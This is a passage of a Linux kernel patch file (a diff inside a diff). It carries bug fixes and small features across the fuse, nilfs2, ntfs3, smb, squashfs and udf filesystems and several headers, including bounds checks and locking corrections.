+ 		if (!is_sync_kiocb(iocb) && iocb->ki_flags & IOCB_DIRECT) {
+@@ -1581,7 +1614,10 @@ static ssize_t fuse_direct_write_iter(struct kiocb *iocb, struct iov_iter *from)
+ 			fuse_write_update_attr(inode, iocb->ki_pos, res);
+ 		}
+ 	}
+-	inode_unlock(inode);
++	if (exclusive_lock)
++		inode_unlock(inode);
++	else
++		inode_unlock_shared(inode);
+ 
+ 	return res;
+ }
+@@ -1703,10 +1739,16 @@ __acquires(fi->lock)
+ 	fuse_writepage_finish(fm, wpa);
+ 	spin_unlock(&fi->lock);
+ 
+-	/* After fuse_writepage_finish() aux request list is private */
++	/* After rb_erase() aux request list is private */
+ 	for (aux = wpa->next; aux; aux = next) {
++		struct backing_dev_info *bdi = inode_to_bdi(aux->inode);
++
+ 		next = aux->next;
+ 		aux->next = NULL;
++
++		dec_wb_stat(&bdi->wb, WB_WRITEBACK);
++		dec_node_page_state(aux->ia.ap.pages[0], NR_WRITEBACK_TEMP);
++		wb_writeout_inc(&bdi->wb);
+ 		fuse_writepage_free(aux);
+ 	}
+ 
+@@ -2931,6 +2973,7 @@ fuse_direct_IO(struct kiocb *iocb, struct iov_iter *iter)
+ 
+ 	if (iov_iter_rw(iter) == WRITE) {
+ 		fuse_write_update_attr(inode, pos, ret);
++		/* For extending writes we already hold exclusive lock */
+ 		if (ret < 0 && offset + count > i_size)
+ 			fuse_do_truncate(file);
+ 	}
+diff --git a/fs/fuse/fuse_i.h b/fs/fuse/fuse_i.h
+index 66c2a99994683..6c3ec70c1b70d 100644
+--- a/fs/fuse/fuse_i.h
++++ b/fs/fuse/fuse_i.h
+@@ -264,8 +264,9 @@ struct fuse_page_desc {
+ struct fuse_args {
+ 	uint64_t nodeid;
+ 	uint32_t opcode;
+-	unsigned short in_numargs;
+-	unsigned short out_numargs;
++	uint8_t in_numargs;
++	uint8_t out_numargs;
++	uint8_t ext_idx;
+ 	bool force:1;
+ 	bool noreply:1;
+ 	bool nocreds:1;
+@@ -276,6 +277,7 @@ struct fuse_args {
+ 	bool page_zeroing:1;
+ 	bool page_replace:1;
+ 	bool may_block:1;
++	bool is_ext:1;
+ 	struct fuse_in_arg in_args[3];
+ 	struct fuse_arg out_args[2];
+ 	void (*end)(struct fuse_mount *fm, struct fuse_args *args, int error);
+@@ -1235,7 +1237,7 @@ int fuse_reverse_inval_inode(struct fuse_conn *fc, u64 nodeid,
+  * then the dentry is unhashed (d_delete()).
+  */
+ int fuse_reverse_inval_entry(struct fuse_conn *fc, u64 parent_nodeid,
+-			     u64 child_nodeid, struct qstr *name);
++			     u64 child_nodeid, struct qstr *name, u32 flags);
+ 
+ int fuse_do_open(struct fuse_mount *fm, u64 nodeid, struct file *file,
+ 		 bool isdir);
+diff --git a/fs/fuse/inode.c b/fs/fuse/inode.c
+index 64618548835b4..332cc885b815e 100644
+--- a/fs/fuse/inode.c
++++ b/fs/fuse/inode.c
+@@ -1327,7 +1327,8 @@ void fuse_send_init(struct fuse_mount *fm)
+ 		FUSE_ABORT_ERROR | FUSE_MAX_PAGES | FUSE_CACHE_SYMLINKS |
+ 		FUSE_NO_OPENDIR_SUPPORT | FUSE_EXPLICIT_INVAL_DATA |
+ 		FUSE_HANDLE_KILLPRIV_V2 | FUSE_SETXATTR_EXT | FUSE_INIT_EXT |
+-		FUSE_SECURITY_CTX;
++		FUSE_SECURITY_CTX |
++		FUSE_HAS_EXPIRE_ONLY;
+ #ifdef CONFIG_FUSE_DAX
+ 	if (fm->fc->dax)
+ 		flags |= FUSE_MAP_ALIGNMENT;
+diff --git a/fs/fuse/xattr.c b/fs/fuse/xattr.c
+index 0d3e7177fce0a..4def41e607cc4 100644
+--- a/fs/fuse/xattr.c
++++ b/fs/fuse/xattr.c
+@@ -81,7 +81,7 @@ ssize_t fuse_getxattr(struct inode *inode, const char *name, void *value,
+ 	}
+ 	ret = fuse_simple_request(fm, &args);
+ 	if (!ret && !size)
+-		ret = min_t(ssize_t, outarg.size, XATTR_SIZE_MAX);
++		ret = min_t(size_t, outarg.size, XATTR_SIZE_MAX);
+ 	if (ret == -ENOSYS) {
+ 		fm->fc->no_getxattr = 1;
+ 		ret = -EOPNOTSUPP;
+@@ -143,7 +143,7 @@ ssize_t fuse_listxattr(struct dentry *entry, char *list, size_t size)
+ 	}
+ 	ret = fuse_simple_request(fm, &args);
+ 	if (!ret && !size)
+-		ret = min_t(ssize_t, outarg.size, XATTR_LIST_MAX);
++		ret = min_t(size_t, outarg.size, XATTR_LIST_MAX);
+ 	if (ret > 0 && size)
+ 		ret = fuse_verify_xattr_list(list, ret);
+ 	if (ret == -ENOSYS) {
+diff --git a/fs/nfs/super.c b/fs/nfs/super.c
+index 05ae23657527d..f7b4df29ac5f0 100644
+--- a/fs/nfs/super.c
++++ b/fs/nfs/super.c
+@@ -47,6 +47,7 @@
+ #include <linux/vfs.h>
+ #include <linux/inet.h>
+ #include <linux/in6.h>
++#include <linux/sched.h>
+ #include <linux/slab.h>
+ #include <net/ipv6.h>
+ #include <linux/netdevice.h>
+@@ -219,6 +220,7 @@ static int __nfs_list_for_each_server(struct list_head *head,
+ 		ret = fn(server, data);
+ 		if (ret)
+ 			goto out;
++		cond_resched();
+ 		rcu_read_lock();
+ 	}
+ 	rcu_read_unlock();
+diff --git a/fs/nilfs2/recovery.c b/fs/nilfs2/recovery.c
+index a9b8d77c8c1d5..ce30b51ac593c 100644
+--- a/fs/nilfs2/recovery.c
++++ b/fs/nilfs2/recovery.c
+@@ -708,6 +708,33 @@ static void nilfs_finish_roll_forward(struct the_nilfs *nilfs,
+ 	brelse(bh);
+ }
+ 
++/**
++ * nilfs_abort_roll_forward - cleaning up after a failed rollforward recovery
++ * @nilfs: nilfs object
++ */
++static void nilfs_abort_roll_forward(struct the_nilfs *nilfs)
++{
++	struct nilfs_inode_info *ii, *n;
++	LIST_HEAD(head);
++
++	/* Abandon inodes that have read recovery data */
++	spin_lock(&nilfs->ns_inode_lock);
++	list_splice_init(&nilfs->ns_dirty_files, &head);
++	spin_unlock(&nilfs->ns_inode_lock);
++	if (list_empty(&head))
++		return;
++
++	set_nilfs_purging(nilfs);
++	list_for_each_entry_safe(ii, n, &head, i_dirty) {
++		spin_lock(&nilfs->ns_inode_lock);
++		list_del_init(&ii->i_dirty);
++		spin_unlock(&nilfs->ns_inode_lock);
++
++		iput(&ii->vfs_inode);
++	}
++	clear_nilfs_purging(nilfs);
++}
++
+ /**
+  * nilfs_salvage_orphan_logs - salvage logs written after the latest checkpoint
+  * @nilfs: nilfs object
+@@ -766,15 +793,19 @@ int nilfs_salvage_orphan_logs(struct the_nilfs *nilfs,
+ 		if (unlikely(err)) {
+ 			nilfs_err(sb, "error %d writing segment for recovery",
+ 				  err);
+-			goto failed;
++			goto put_root;
+ 		}
+ 
+ 		nilfs_finish_roll_forward(nilfs, ri);
+ 	}
+ 
+- failed:
++put_root:
+ 	nilfs_put_root(root);
+ 	return err;
++
++failed:
++	nilfs_abort_roll_forward(nilfs);
++	goto put_root;
+ }
+ 
+ /**
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 5110c50be2918..6bc8ad0d41f87 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -1833,6 +1833,9 @@ static void nilfs_segctor_abort_construction(struct nilfs_sc_info *sci,
+ 	nilfs_abort_logs(&logs, ret ? : err);
+ 
+ 	list_splice_tail_init(&sci->sc_segbufs, &logs);
++	if (list_empty(&logs))
++		return; /* if the first segment buffer preparation failed */
++
+ 	nilfs_cancel_segusage(&logs, nilfs->ns_sufile);
+ 	nilfs_free_incomplete_logs(&logs, nilfs);
+ 
+@@ -2077,7 +2080,7 @@ static int nilfs_segctor_do_construct(struct nilfs_sc_info *sci, int mode)
+ 
+ 		err = nilfs_segctor_begin_construction(sci, nilfs);
+ 		if (unlikely(err))
+-			goto out;
++			goto failed;
+ 
+ 		/* Update time stamp */
+ 		sci->sc_seg_ctime = ktime_get_real_seconds();
+@@ -2140,10 +2143,9 @@ static int nilfs_segctor_do_construct(struct nilfs_sc_info *sci, int mode)
+ 	return err;
+ 
+  failed_to_write:
+-	if (sci->sc_stage.flags & NILFS_CF_IFILE_STARTED)
+-		nilfs_redirty_inodes(&sci->sc_dirty_files);
+-
+  failed:
++	if (mode == SC_LSEG_SR && nilfs_sc_cstage_get(sci) >= NILFS_ST_IFILE)
++		nilfs_redirty_inodes(&sci->sc_dirty_files);
+ 	if (nilfs_doing_gc())
+ 		nilfs_redirty_inodes(&sci->sc_gc_inodes);
+ 	nilfs_segctor_abort_construction(sci, nilfs, err);
+diff --git a/fs/nilfs2/sysfs.c b/fs/nilfs2/sysfs.c
+index 379d22e28ed62..905c7eadf9676 100644
+--- a/fs/nilfs2/sysfs.c
++++ b/fs/nilfs2/sysfs.c
+@@ -836,9 +836,15 @@ ssize_t nilfs_dev_revision_show(struct nilfs_dev_attr *attr,
+ 				struct the_nilfs *nilfs,
+ 				char *buf)
+ {
+-	struct nilfs_super_block **sbp = nilfs->ns_sbp;
+-	u32 major = le32_to_cpu(sbp[0]->s_rev_level);
+-	u16 minor = le16_to_cpu(sbp[0]->s_minor_rev_level);
++	struct nilfs_super_block *raw_sb;
++	u32 major;
++	u16 minor;
++
++	down_read(&nilfs->ns_sem);
++	raw_sb = nilfs->ns_sbp[0];
++	major = le32_to_cpu(raw_sb->s_rev_level);
++	minor = le16_to_cpu(raw_sb->s_minor_rev_level);
++	up_read(&nilfs->ns_sem);
+ 
+ 	return sysfs_emit(buf, "%d.%d\n", major, minor);
+ }
+@@ -856,8 +862,13 @@ ssize_t nilfs_dev_device_size_show(struct nilfs_dev_attr *attr,
+ 				    struct the_nilfs *nilfs,
+ 				    char *buf)
+ {
+-	struct nilfs_super_block **sbp = nilfs->ns_sbp;
+-	u64 dev_size = le64_to_cpu(sbp[0]->s_dev_size);
++	struct nilfs_super_block *raw_sb;
++	u64 dev_size;
++
++	down_read(&nilfs->ns_sem);
++	raw_sb = nilfs->ns_sbp[0];
++	dev_size = le64_to_cpu(raw_sb->s_dev_size);
++	up_read(&nilfs->ns_sem);
+ 
+ 	return sysfs_emit(buf, "%llu\n", dev_size);
+ }
+@@ -879,9 +890,15 @@ ssize_t nilfs_dev_uuid_show(struct nilfs_dev_attr *attr,
+ 			    struct the_nilfs *nilfs,
+ 			    char *buf)
+ {
+-	struct nilfs_super_block **sbp = nilfs->ns_sbp;
++	struct nilfs_super_block *raw_sb;
++	ssize_t len;
+ 
+-	return sysfs_emit(buf, "%pUb\n", sbp[0]->s_uuid);
++	down_read(&nilfs->ns_sem);
++	raw_sb = nilfs->ns_sbp[0];
++	len = sysfs_emit(buf, "%pUb\n", raw_sb->s_uuid);
++	up_read(&nilfs->ns_sem);
++
++	return len;
+ }
+ 
+ static
+@@ -889,10 +906,16 @@ ssize_t nilfs_dev_volume_name_show(struct nilfs_dev_attr *attr,
+ 				    struct the_nilfs *nilfs,
+ 				    char *buf)
+ {
+-	struct nilfs_super_block **sbp = nilfs->ns_sbp;
++	struct nilfs_super_block *raw_sb;
++	ssize_t len;
++
++	down_read(&nilfs->ns_sem);
++	raw_sb = nilfs->ns_sbp[0];
++	len = scnprintf(buf, sizeof(raw_sb->s_volume_name), "%s\n",
++			raw_sb->s_volume_name);
++	up_read(&nilfs->ns_sem);
+ 
+-	return scnprintf(buf, sizeof(sbp[0]->s_volume_name), "%s\n",
+-			 sbp[0]->s_volume_name);
++	return len;
+ }
+ 
+ static const char dev_readme_str[] =
+diff --git a/fs/ntfs3/dir.c b/fs/ntfs3/dir.c
+index dcd689ed4baae..a4ab0164d150d 100644
+--- a/fs/ntfs3/dir.c
++++ b/fs/ntfs3/dir.c
+@@ -272,9 +272,12 @@ struct inode *dir_search_u(struct inode *dir, const struct cpu_str *uni,
+ 	return err == -ENOENT ? NULL : err ? ERR_PTR(err) : inode;
+ }
+ 
+-static inline int ntfs_filldir(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+-			       const struct NTFS_DE *e, u8 *name,
+-			       struct dir_context *ctx)
++/*
++ * returns false if 'ctx' if full
++ */
++static inline bool ntfs_dir_emit(struct ntfs_sb_info *sbi,
++				 struct ntfs_inode *ni, const struct NTFS_DE *e,
++				 u8 *name, struct dir_context *ctx)
+ {
+ 	const struct ATTR_FILE_NAME *fname;
+ 	unsigned long ino;
+@@ -284,29 +287,29 @@ static inline int ntfs_filldir(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 	fname = Add2Ptr(e, sizeof(struct NTFS_DE));
+ 
+ 	if (fname->type == FILE_NAME_DOS)
+-		return 0;
++		return true;
+ 
+ 	if (!mi_is_ref(&ni->mi, &fname->home))
+-		return 0;
++		return true;
+ 
+ 	ino = ino_get(&e->ref);
+ 
+ 	if (ino == MFT_REC_ROOT)
+-		return 0;
++		return true;
+ 
+ 	/* Skip meta files. Unless option to show metafiles is set. */
+ 	if (!sbi->options->showmeta && ntfs_is_meta_file(sbi, ino))
+-		return 0;
++		return true;
+ 
+ 	if (sbi->options->nohidden && (fname->dup.fa & FILE_ATTRIBUTE_HIDDEN))
+-		return 0;
++		return true;
+ 
+ 	name_len = ntfs_utf16_to_nls(sbi, fname->name, fname->name_len, name,
+ 				     PATH_MAX);
+ 	if (name_len <= 0) {
+ 		ntfs_warn(sbi->sb, "failed to convert name for inode %lx.",
+ 			  ino);
+-		return 0;
++		return true;
+ 	}
+ 
+ 	/*
+@@ -336,17 +339,20 @@ static inline int ntfs_filldir(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 		}
+ 	}
+ 
+-	return !dir_emit(ctx, (s8 *)name, name_len, ino, dt_type);
++	return dir_emit(ctx, (s8 *)name, name_len, ino, dt_type);
+ }
+ 
+ /*
+  * ntfs_read_hdr - Helper function for ntfs_readdir().
++ *
++ * returns 0 if ok.
++ * returns -EINVAL if directory is corrupted.
++ * returns +1 if 'ctx' is full.
+  */
+ static int ntfs_read_hdr(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 			 const struct INDEX_HDR *hdr, u64 vbo, u64 pos,
+ 			 u8 *name, struct dir_context *ctx)
+ {
+-	int err;
+ 	const struct NTFS_DE *e;
+ 	u32 e_size;
+ 	u32 end = le32_to_cpu(hdr->used);
+@@ -354,12 +360,12 @@ static int ntfs_read_hdr(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 
+ 	for (;; off += e_size) {
+ 		if (off + sizeof(struct NTFS_DE) > end)
+-			return -1;
++			return -EINVAL;
+ 
+ 		e = Add2Ptr(hdr, off);
+ 		e_size = le16_to_cpu(e->size);
+ 		if (e_size < sizeof(struct NTFS_DE) || off + e_size > end)
+-			return -1;
++			return -EINVAL;
+ 
+ 		if (de_is_last(e))
+ 			return 0;
+@@ -369,14 +375,15 @@ static int ntfs_read_hdr(struct ntfs_sb_info *sbi, struct ntfs_inode *ni,
+ 			continue;
+ 
+ 		if (le16_to_cpu(e->key_size) < SIZEOF_ATTRIBUTE_FILENAME)
+-			return -1;
++			return -EINVAL;
+ 
+ 		ctx->pos = vbo + off;
+ 
+ 		/* Submit the name to the filldir callback. */
+-		err = ntfs_filldir(sbi, ni, e, name, ctx);
+-		if (err)
+-			return err;
++		if (!ntfs_dir_emit(sbi, ni, e, name, ctx)) {
++			/* ctx is full. */
++			return +1;
++		}
+ 	}
+ }
+ 
+@@ -475,8 +482,6 @@ static int ntfs_readdir(struct file *file, struct dir_context *ctx)
+ 
+ 		vbo = (u64)bit << index_bits;
+ 		if (vbo >= i_size) {
+-			ntfs_inode_err(dir, "Looks like your dir is corrupt");
+-			ctx->pos = eod;
+ 			err = -EINVAL;
+ 			goto out;
+ 		}
+@@ -499,9 +504,16 @@ static int ntfs_readdir(struct file *file, struct dir_context *ctx)
+ 	__putname(name);
+ 	put_indx_node(node);
+ 
+-	if (err == -ENOENT) {
++	if (err == 1) {
++		/* 'ctx' is full. */
++		err = 0;
++	} else if (err == -ENOENT) {
+ 		err = 0;
+ 		ctx->pos = pos;
++	} else if (err < 0) {
++		if (err == -EINVAL)
++			ntfs_inode_err(dir, "directory corrupted");
++		ctx->pos = eod;
+ 	}
+ 
+ 	return err;
+diff --git a/fs/ntfs3/frecord.c b/fs/ntfs3/frecord.c
+index 6cce71cc750ea..7bfdc91fae1ed 100644
+--- a/fs/ntfs3/frecord.c
++++ b/fs/ntfs3/frecord.c
+@@ -1601,8 +1601,10 @@ int ni_delete_all(struct ntfs_inode *ni)
+ 		asize = le32_to_cpu(attr->size);
+ 		roff = le16_to_cpu(attr->nres.run_off);
+ 
+-		if (roff > asize)
++		if (roff > asize) {
++			_ntfs_bad_inode(&ni->vfs_inode);
+ 			return -EINVAL;
++		}
+ 
+ 		/* run==1 means unpack and deallocate. */
+ 		run_unpack_ex(RUN_DEALLOCATE, sbi, ni->mi.rno, svcn, evcn, svcn,
+diff --git a/fs/smb/client/smb2ops.c b/fs/smb/client/smb2ops.c
+index 2291081653a85..5e9478f31d47a 100644
+--- a/fs/smb/client/smb2ops.c
++++ b/fs/smb/client/smb2ops.c
+@@ -3443,13 +3443,15 @@ static long smb3_zero_data(struct file *file, struct cifs_tcon *tcon,
+ }
+ 
+ static long smb3_zero_range(struct file *file, struct cifs_tcon *tcon,
+-			    loff_t offset, loff_t len, bool keep_size)
++			    unsigned long long offset, unsigned long long len,
++			    bool keep_size)
+ {
+ 	struct cifs_ses *ses = tcon->ses;
+ 	struct inode *inode = file_inode(file);
+ 	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+ 	struct cifsFileInfo *cfile = file->private_data;
+-	unsigned long long new_size;
++	struct netfs_inode *ictx = netfs_inode(inode);
++	unsigned long long i_size, new_size, remote_size;
+ 	long rc;
+ 	unsigned int xid;
+ 	__le64 eof;
+@@ -3462,6 +3464,16 @@ static long smb3_zero_range(struct file *file, struct cifs_tcon *tcon,
+ 	inode_lock(inode);
+ 	filemap_invalidate_lock(inode->i_mapping);
+ 
++	i_size = i_size_read(inode);
++	remote_size = ictx->remote_i_size;
++	if (offset + len >= remote_size && offset < i_size) {
++		unsigned long long top = umin(offset + len, i_size);
++
++		rc = filemap_write_and_wait_range(inode->i_mapping, offset, top - 1);
++		if (rc < 0)
++			goto zero_range_exit;
++	}
++
+ 	/*
+ 	 * We zero the range through ioctl, so we need remove the page caches
+ 	 * first, otherwise the data may be inconsistent with the server.
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 7263889a772da..898622b52b48e 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -1703,6 +1703,8 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 		rc = ksmbd_session_register(conn, sess);
+ 		if (rc)
+ 			goto out_err;
++
++		conn->binding = false;
+ 	} else if (conn->dialect >= SMB30_PROT_ID &&
+ 		   (server_conf.flags & KSMBD_GLOBAL_FLAG_SMB3_MULTICHANNEL) &&
+ 		   req->Flags & SMB2_SESSION_REQ_FLAG_BINDING) {
+@@ -1781,6 +1783,8 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			sess = NULL;
+ 			goto out_err;
+ 		}
++
++		conn->binding = false;
+ 	}
+ 	work->sess = sess;
+ 
+diff --git a/fs/smb/server/transport_tcp.c b/fs/smb/server/transport_tcp.c
+index 0012919309f11..25f7c86ba9b98 100644
+--- a/fs/smb/server/transport_tcp.c
++++ b/fs/smb/server/transport_tcp.c
+@@ -622,8 +622,10 @@ int ksmbd_tcp_set_interfaces(char *ifc_list, int ifc_list_sz)
+ 		for_each_netdev(&init_net, netdev) {
+ 			if (netif_is_bridge_port(netdev))
+ 				continue;
+-			if (!alloc_iface(kstrdup(netdev->name, GFP_KERNEL)))
++			if (!alloc_iface(kstrdup(netdev->name, GFP_KERNEL))) {
++				rtnl_unlock();
+ 				return -ENOMEM;
++			}
+ 		}
+ 		rtnl_unlock();
+ 		bind_additional_ifaces = 1;
+diff --git a/fs/squashfs/inode.c b/fs/squashfs/inode.c
+index 24463145b3513..f31649080a881 100644
+--- a/fs/squashfs/inode.c
++++ b/fs/squashfs/inode.c
+@@ -276,8 +276,13 @@ int squashfs_read_inode(struct inode *inode, long long ino)
+ 		if (err < 0)
+ 			goto failed_read;
+ 
+-		set_nlink(inode, le32_to_cpu(sqsh_ino->nlink));
+ 		inode->i_size = le32_to_cpu(sqsh_ino->symlink_size);
++		if (inode->i_size > PAGE_SIZE) {
++			ERROR("Corrupted symlink\n");
++			return -EINVAL;
++		}
++
++		set_nlink(inode, le32_to_cpu(sqsh_ino->nlink));
+ 		inode->i_op = &squashfs_symlink_inode_ops;
+ 		inode_nohighmem(inode);
+ 		inode->i_data.a_ops = &squashfs_symlink_aops;
+diff --git a/fs/udf/super.c b/fs/udf/super.c
+index 3b6419f29a4c7..fa790be4f19f0 100644
+--- a/fs/udf/super.c
++++ b/fs/udf/super.c
+@@ -1084,12 +1084,19 @@ static int udf_fill_partdesc_info(struct super_block *sb,
+ 	struct udf_part_map *map;
+ 	struct udf_sb_info *sbi = UDF_SB(sb);
+ 	struct partitionHeaderDesc *phd;
++	u32 sum;
+ 	int err;
+ 
+ 	map = &sbi->s_partmaps[p_index];
+ 
+ 	map->s_partition_len = le32_to_cpu(p->partitionLength); /* blocks */
+ 	map->s_partition_root = le32_to_cpu(p->partitionStartingLocation);
++	if (check_add_overflow(map->s_partition_root, map->s_partition_len,
++			       &sum)) {
++		udf_err(sb, "Partition %d has invalid location %u + %u\n",
++			p_index, map->s_partition_root, map->s_partition_len);
++		return -EFSCORRUPTED;
++	}
+ 
+ 	if (p->accessType == cpu_to_le32(PD_ACCESS_TYPE_READ_ONLY))
+ 		map->s_partition_flags |= UDF_PART_FLAG_READ_ONLY;
+@@ -1145,6 +1152,14 @@ static int udf_fill_partdesc_info(struct super_block *sb,
+ 		bitmap->s_extPosition = le32_to_cpu(
+ 				phd->unallocSpaceBitmap.extPosition);
+ 		map->s_partition_flags |= UDF_PART_FLAG_UNALLOC_BITMAP;
++		/* Check whether math over bitmap won't overflow. */
++		if (check_add_overflow(map->s_partition_len,
++				       sizeof(struct spaceBitmapDesc) << 3,
++				       &sum)) {
++			udf_err(sb, "Partition %d is too long (%u)\n", p_index,
++				map->s_partition_len);
++			return -EFSCORRUPTED;
++		}
+ 		udf_debug("unallocSpaceBitmap (part %d) @ %u\n",
+ 			  p_index, bitmap->s_extPosition);
+ 	}
+diff --git a/include/linux/mm.h b/include/linux/mm.h
+index eefb0948110ae..971186f0b7b07 100644
+--- a/include/linux/mm.h
++++ b/include/linux/mm.h
+@@ -92,6 +92,10 @@ extern const int mmap_rnd_compat_bits_max;
+ extern int mmap_rnd_compat_bits __read_mostly;
+ #endif
+ 
++#ifndef PHYSMEM_END
++# define PHYSMEM_END	((1ULL << MAX_PHYSMEM_BITS) - 1)
++#endif
++
+ #include <asm/page.h>
+ #include <asm/processor.h>
+ 
+diff --git a/include/linux/regulator/consumer.h b/include/linux/regulator/consumer.h
+index a9ca87a8f4e61..60bc7e143869b 100644
+--- a/include/linux/regulator/consumer.h
++++ b/include/linux/regulator/consumer.h
+@@ -244,6 +244,8 @@ int regulator_disable_deferred(struct regulator *regulator, int ms);
+ 
+ int __must_check regulator_bulk_get(struct device *dev, int num_consumers,
+ 				    struct regulator_bulk_data *consumers);
++int __must_check of_regulator_bulk_get_all(struct device *dev, struct device_node *np,
++					   struct regulator_bulk_data **consumers);
+ int __must_check devm_regulator_bulk_get(struct device *dev, int num_consumers,
+ 					 struct regulator_bulk_data *consumers);
+ void devm_regulator_bulk_put(struct regulator_bulk_data *consumers);
+@@ -479,6 +481,20 @@ static inline int devm_regulator_bulk_get(struct device *dev, int num_consumers,
+ 	return 0;
+ }
+ 
++static inline int of_regulator_bulk_get_all(struct device *dev, struct device_node *np,
++					    struct regulator_bulk_data **consumers)
++{
++	return 0;
++}
++
++static inline int devm_regulator_bulk_get_const(
++	struct device *dev, int num_consumers,
++	const struct regulator_bulk_data *in_consumers,
++	struct regulator_bulk_data **out_consumers)
++{
++	return 0;
++}
++
+ static inline int regulator_bulk_enable(int num_consumers,
+ 					struct regulator_bulk_data *consumers)
+ {
+diff --git a/include/net/bluetooth/hci_core.h b/include/net/bluetooth/hci_core.h
+index 9df7e29386bcc..98c0a82bd5338 100644
+--- a/include/net/bluetooth/hci_core.h
++++ b/include/net/bluetooth/hci_core.h
+@@ -187,7 +187,6 @@ struct blocked_key {
+ struct smp_csrk {
+ 	bdaddr_t bdaddr;
+ 	u8 bdaddr_type;
+-	u8 link_type;
+ 	u8 type;
+ 	u8 val[16];
+ };
+@@ -197,7 +196,6 @@ struct smp_ltk {
+ 	struct rcu_head rcu;
+ 	bdaddr_t bdaddr;
+ 	u8 bdaddr_type;
+-	u8 link_type;
+ 	u8 authenticated;
+ 	u8 type;
+ 	u8 enc_size;
+@@ -212,7 +210,6 @@ struct smp_irk {
+ 	bdaddr_t rpa;
+ 	bdaddr_t bdaddr;
+ 	u8 addr_type;
+-	u8 link_type;
+ 	u8 val[16];
+ };
+ 
+@@ -220,8 +217,6 @@ struct link_key {
+ 	struct list_head list;
+ 	struct rcu_head rcu;
+ 	bdaddr_t bdaddr;
+-	u8 bdaddr_type;
+-	u8 link_type;
+ 	u8 type;
+ 	u8 val[HCI_LINK_KEY_SIZE];
+ 	u8 pin_len;
+diff --git a/include/uapi/drm/drm_fourcc.h b/include/uapi/drm/drm_fourcc.h
+index 868d6909b7182..6245928d76ee5 100644
+--- a/include/uapi/drm/drm_fourcc.h
++++ b/include/uapi/drm/drm_fourcc.h
+@@ -1390,6 +1390,7 @@ drm_fourcc_canonicalize_nvidia_format_mod(__u64 modifier)
+ #define AMD_FMT_MOD_TILE_VER_GFX10 2
+ #define AMD_FMT_MOD_TILE_VER_GFX10_RBPLUS 3
+ #define AMD_FMT_MOD_TILE_VER_GFX11 4
++#define AMD_FMT_MOD_TILE_VER_GFX12 5
+ 
+ /*
+  * 64K_S is the same for GFX9/GFX10/GFX10_RBPLUS and hence has GFX9 as canonical
+@@ -1400,6 +1401,8 @@ drm_fourcc_canonicalize_nvidia_format_mod(__u64 modifier)
+ /*
+  * 64K_D for non-32 bpp is the same for GFX9/GFX10/GFX10_RBPLUS and hence has
+  * GFX9 as canonical version.
++ *
++ * 64K_D_2D on GFX12 is identical to 64K_D on GFX11.
+  */
+ #define AMD_FMT_MOD_TILE_GFX9_64K_D 10
+ #define AMD_FMT_MOD_TILE_GFX9_64K_S_X 25
+@@ -1407,6 +1410,21 @@ drm_fourcc_canonicalize_nvidia_format_mod(__u64 modifier)
+ #define AMD_FMT_MOD_TILE_GFX9_64K_R_X 27
+ #define AMD_FMT_MOD_TILE_GFX11_256K_R_X 31
+ 
++/* Gfx12 swizzle modes:
++ *    0 - LINEAR
++ *    1 - 256B_2D  - 2D block dimensions
++ *    2 - 4KB_2D
++ *    3 - 64KB_2D
++ *    4 - 256KB_2D
++ *    5 - 4KB_3D   - 3D block dimensions
++ *    6 - 64KB_3D
++ *    7 - 256KB_3D
++ */
++#define AMD_FMT_MOD_TILE_GFX12_256B_2D 1
++#define AMD_FMT_MOD_TILE_GFX12_4K_2D 2
++#define AMD_FMT_MOD_TILE_GFX12_64K_2D 3
++#define AMD_FMT_MOD_TILE_GFX12_256K_2D 4
++
+ #define AMD_FMT_MOD_DCC_BLOCK_64B 0
+ #define AMD_FMT_MOD_DCC_BLOCK_128B 1
+ #define AMD_FMT_MOD_DCC_BLOCK_256B 2
+diff --git a/include/uapi/linux/fuse.h b/include/uapi/linux/fuse.h
+index 76ee8f9e024af..18e56647accd4 100644
+--- a/include/uapi/linux/fuse.h
++++ b/include/uapi/linux/fuse.h
+@@ -197,6 +197,13 @@
+  *
+  *  7.37
+  *  - add FUSE_TMPFILE
++ *
++ *  7.38
++ *  - add FUSE_EXPIRE_ONLY flag to fuse_notify_inval_entry
++ *  - add FOPEN_PARALLEL_DIRECT_WRITES
++ *  - add total_extlen to fuse_in_header
++ *  - add FUSE_MAX_NR_SECCTX
++ *  - add extension header
+  */
+ 
+ #ifndef _LINUX_FUSE_H
+@@ -232,7 +239,7 @@
+ #define FUSE_KERNEL_VERSION 7
+ 
+ /** Minor version number of this interface */
+-#define FUSE_KERNEL_MINOR_VERSION 37
++#define FUSE_KERNEL_MINOR_VERSION 38
+ 
+ /** The node ID of the root inode */
+ #define FUSE_ROOT_ID 1
+@@ -304,6 +311,7 @@ struct fuse_file_lock {
+  * FOPEN_CACHE_DIR: allow caching this directory
+  * FOPEN_STREAM: the file is stream-like (no file position at all)
+  * FOPEN_NOFLUSH: don't flush data cache on close (unless FUSE_WRITEBACK_CACHE)
++ * FOPEN_PARALLEL_DIRECT_WRITES: Allow concurrent direct writes on the same inode
+  */
+ #define FOPEN_DIRECT_IO		(1 << 0)
+ #define FOPEN_KEEP_CACHE	(1 << 1)
+@@ -311,6 +319,7 @@ struct fuse_file_lock {
+ #define FOPEN_CACHE_DIR		(1 << 3)
+ #define FOPEN_STREAM		(1 << 4)
+ #define FOPEN_NOFLUSH		(1 << 5)
++#define FOPEN_PARALLEL_DIRECT_WRITES	(1 << 6)
+ 
+ /**
+  * INIT request/reply flags
+@@ -356,6 +365,7 @@ struct fuse_file_lock {
+  * FUSE_SECURITY_CTX:	add security context to create, mkdir, symlink, and
+  *			mknod
+  * FUSE_HAS_INODE_DAX:  use per inode DAX
++ * FUSE_HAS_EXPIRE_ONLY: kernel supports expiry-only entry invalidation
+  */
+ #define FUSE_ASYNC_READ		(1 << 0)
+ #define FUSE_POSIX_LOCKS	(1 << 1)
+@@ -392,6 +402,7 @@ struct fuse_file_lock {
